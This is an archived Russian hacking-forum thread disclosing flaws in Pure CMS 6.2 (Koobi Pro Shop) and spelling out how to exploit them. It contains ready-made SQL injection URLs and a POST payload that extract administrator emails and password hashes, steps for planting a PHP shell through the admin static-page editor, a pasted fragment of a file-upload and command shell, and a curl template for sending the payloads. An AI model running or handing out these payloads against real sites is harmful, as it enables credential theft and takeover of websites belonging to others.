Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Уязвимости Koobi Pro Shop Pure CMS 6.2 (https://forum.antichat.xyz/showthread.php?t=217439)

v1d0qz 14.07.2010 22:21
[COLOR="Orange"][B]Уязвимости Koobi Pro Shop Pure CMS 6.2 + возможно уязвимы вроде как создатели какие-то Дайвер и Макс, видимо забросили и "это" уже те, кто дописывал данный движок

Профикс: Вероятнее всего => "kpro"

Хэширование: md5(md5($pass))

Адм&панель: /admin/

1)sqli

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_gallery WHERE id=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]galid[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$row_gal[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fetchrow[/COLOR][COLOR="#007700"]();[/COLOR][/COLOR
Эксплуатация

Код:
Code:
index.php?p=gallerypic&img_id=9&galid=2+or+(1,1)=(select+count(0),concat((select+concat_ws(0x3a,email,pass)+from+[prefix]_user+where+ugroup=1),floor(rand(0)*2))from(information_schema.columns)group+by+2)&area=1&ascdesc=desc
2)sqli

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_gallery_items WHERE id=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]img_id[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fetchrow[/COLOR][COLOR="#007700"]();[/COLOR][/COLOR
Эксплуатация

Код:
Code:
index.php?p=gallerypic&img_id=-9+union+select+1,2,3,0x78656b,5,6,concat_ws(0x3a,email,pass),8,9+from+[prefix]_user+where+ugroup=1&galid=1&area=1&ascdesc=desc
3)Inject INSERT

/functions/Func.InOutput.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]iform[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$chars[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$allowed[/COLOR][COLOR="#007700"])

{

 global[/COLOR][COLOR="#0000BB"]$pref[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]addslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strip_tags[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$allowed[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$chars[/COLOR][COLOR="#007700"]);

 return[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"];

}[/COLOR][/COLOR
/functions/Func.Post.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]formtext[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$maxlength[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$maxlength[/COLOR][COLOR="#007700"]);

 return[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"];

}[/COLOR][/COLOR
/system/gallerypic.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(![/COLOR][COLOR="#0000BB"]$error[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]formtext[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'text'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$MAXCOMMLENGTH[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"INSERT INTO "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_gallerycomments (id, imgid, ctime, autor, title, comment, ip) VALUES ('','"[/COLOR][COLOR="#007700"].(int)[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'img_id'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$UID[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]iform[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]"255"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REMOTE_ADDR'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"')"[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
Эксплуатация

POST parameters

Код:
Code:
title=[qqq=254]\\&kmode=&kmode=normal&text=, (select concat(email,0x3a,pass) from [prefix]_users where ugroup=1 limit 0,1),1)#&scode=[security-code]&do=send&area=1
= видим пароль в заголовке комментария.

4)Заливка шелла

Вроде как не я первый нашел. Потому опишу в двух словах. За подробностями обращайтесь к гуглу.

Админка-Статические страницы>Создать документ

Название => rdot

Текст => {php} phpinfo(); {/php}

connect => /index.php?area=1&p=static&page=rdot

5)пути

Код:
Code:
/inc/init.php
********************* (c)v1d0q ********************

Ali_MiX 15.07.2010 04:49
первый попавшийся

Код:
Code:
`Powered by Pure CMS 6.2 RUS Overdoze Team [ antichat.ru & overdoze.ru ]
Код HTML:
HTML:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(0x3a,email,pass) from [prefix]_user where ugroup=1),floor(rand(0)*2))from(infor' at line 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(0x3a,email,pass) from [prefix]_user where ugroup=1),floor(rand(0)*2))from(infor' at line 1

emillord 15.07.2010 13:10
Ali_MiX

В запросе не забудь поменять [prefix] на префик БД и проверь на лишние пробелы.

Ali_MiX 16.07.2010 12:16
эм не читал запрос(

вот поправленые с префиксом

Цитата:
Сообщение от None
index.php?p=gallerypic&img_id=-9+union+select+1,2,3,0x78656b,5,6,concat_ws(0x3a,e mail,pass),8,9+from+pure_user+where+ugroup=1&galid =1&area=1&ascdesc=desc
index.php?p=gallerypic&img_id=9&galid=2+or+(1,1)=( select+count(0),concat((select+concat_ws(0x3a,emai l,pass)+from+pure_user+where+ugroup=1),floor(rand( 0)*2))from(information_schema.columns)group+by+2)& area=1&ascdesc=desc

Ali_MiX 17.07.2010 11:31
Не разобрался с заливкой шелла. Вставлял мини шелл код между тегами php и них.

пробовал через инклуд... тож самое

что то типа такого вставлял

PHP код:
PHP:
[COLOR="#000000"]

Загрузчик













   Система:



[COLOR="#0000BB"]

[/COLOR]

   Our permissions:

[COLOR="#0000BB"]

[/COLOR]

   Our locality:

[COLOR="#0000BB"]

[/COLOR]



[COLOR="#0000BB"][/COLOR]





  Файл для загрузки :









  Расположение:

[/COLOR]">















 





  Вводи команду :



[/COLOR]">













 











[COLOR="#0000BB"][/COLOR]





2003 ©













[/COLOR

lexaoptimist 20.08.2011 16:54
Приветствую всех!

Имеется у меня сайт на Powered by Pure CMS 6.2 RUS Overdoze Team

Как мне можно проверить имеются ли в системе вышеописанные дырки?

Первые два действия я так понимаю ввожу через адресную строку:

домен.ру/ndex.php?p=gallerypic&img_id=-9+union+select+1,2,3,0x78656b,5,6,concat_ws(0x3a,e mail,pass),8,9+from+pure_user+where+ugroup=1&galid =1&area=1&ascdesc=desc

и

домен.ру/index.php?p=gallerypic&img_id=9&galid=2+or+(1,1)=( select+count(0),concat((select+c oncat_ws(0x3a,email,pass)+from+pure_user+where+ugr oup=1),floor(rand(0)*2))from(information_schema.co lumns)group+by+2)&area=1&ascdesc=desc

что после этого должно произойти?

и как отправить POST parameters?

title=[qqq=254]\\&kmode=&kmode=normal&text=, (select concat(email,0x3a,pass) from [prefix]_users where ugroup=1 limit 0,1),1)#&scode=[security-code]&do=send&area=1

и следовательно после этого я должен буду получить пароль к админке?

Заранее благодарю за советы и помощь!

RexTiam 20.08.2011 20:11
Цитата:
Сообщение от None
concat(email,0x3a,pass) from [prefix]_users where ugroup=1 limit
[prefix]_users - как у тебя указана в бд. прификс твой.

запрос пост отправить с помощью curl

$ch = curl_init();

//curl_setopt($ch, CURLOPT_PROXY, "1.2.3.4:123"); //если нужен прокси

curl_setopt($ch, CURLOPT_POST, 1);

curl_setopt($ch, CURLOPT_URL, "http://www.site.com/form.php"); //куда шлем

curl_setopt($ch, CURLOPT_POSTFIELDS, "x=231&y=342"); //что шлем

curl_setopt($ch, CURLOPT_REFERER, "http://www.site.com");

curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; MyIE2; .NET CLR 1.1.4322)");

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_HEADER, 1);

curl_setopt($ch, CURLOPT_NOBODY, 0);

$result=curl_exec ($ch);

curl_close ($ch);

echo $result;

и так же посмотри вот эту тему, много полезных программ

/threadnav240692-1-10.html


Время: 13:21